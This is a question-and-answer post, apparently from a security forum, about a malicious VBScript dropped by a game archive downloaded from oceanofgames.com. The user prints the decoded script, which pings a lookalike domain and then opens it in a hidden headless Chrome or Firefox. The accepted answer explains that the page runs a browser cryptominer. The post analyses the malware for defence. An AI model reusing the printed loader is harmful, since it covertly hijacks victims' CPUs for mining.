# Is this a malware? It is from oceanofgames.com

Tags: vbscript, reverse-engineering, malware, antimalware

I downloaded a game from oceanofgames.com.
there is a archive in it named "Step 2 - Extract Setup.rar". It is almost in every games downloaded from oceanofgames.com. When I extract and run it, it is detected as malware. I have Avast, it shows this
[message](https://i.stack.imgur.com/XO1qX.png)

It creates "Windows Updates service.vbs" and "encode.vbs" in %appdata%\Windows Updates Files. "encode.vbs" converts "Windows Updates service.**vbs**" to "Windows Updates service.**vbe**" and then runs it. I decoded the **vbe** file. Please tell me what is this doing.

```vb
on Error Resume Next

Sub Pause(NSeconds)

Wscript.Sleep(NSeconds*3000)

End Sub

Dim visualcpp

Set visualcpp = CreateObject("WScript.Shell")

counter = True

While counter = True

website = "www.google.com.739471594492594.windows-display-service.com"

checkstring = "ping -n 1 -w 300 " & website

status = visualcpp.Run(checkstring, 0 , True)

If status = 0 Then

counter = False

Else

Pause(21)

End If

Wend

returncodestatus = "1"

returncodestatus = visualcpp.run("chrome --headless --disable-gpu --remote-debugging-port=9222 http://www.google.com.739471594492594.windows-display-service.com",0,false)

if returncodestatus <> 0 then

returncodestatus=visualcpp.run("firefox -no-remote -CreateProfile user",0,false)

returncodestatus=visualcpp.run("firefox -no-remote -headless -new-instance -P ""user"" --start-debugger-server ws:6000 http://www.google.com.739471594492594.windows-display-service.com",0,false)

End If
```

The URL in variable "website" is blacklisted by Avast.

Answer (score 8, accepted):

It is slowing down your computer and stealing your electricity by abusing half of your CPU power for mining cryptocurrency in a hidden browser window. See [this article](https://awakesecurity.com/blog/everythingislife-a-masquerading-cryptocurrency-mining-campaign/) for full breakdown of this shady tactic. So yes, it is malware.

What the file does is checking whether `www.google.com.739471594492594.windows-display-service.com` is available by pinging it. It will try this in a loop if it isn't. If it is, it will then attempt to open a headless Chrome instance, or if that fails (for example because Chrome is not installed), it will create a new hidden Firefox profile called "user" and open a headless Firefox instance with that profile. In any case, the aforementioned website is opened there.

That website - whose domain is made to look more legitimate by adding `www.google.com.` at the start and using `windows` in it - consists of a number of bogus articles (probably stolen from elsewhere), but most importantly it also loads a WebAssembly-based crypto mining software and executes it with half the number of threads that your CPU has, effectively stealing half of your CPU power. It will attempt to mine some cryptocurrency that then gets credited to the authors of this malware.

Comment: It just runs one time or runs on every startup?.

Comment: The code you showed does only what I described, i.e. once. I don't know if the other file you mentioned (`encode.vbs`) does something else beyond that, since you didn't show it. By the way, bothering people multiple times will make them _less_ likely to reply to you.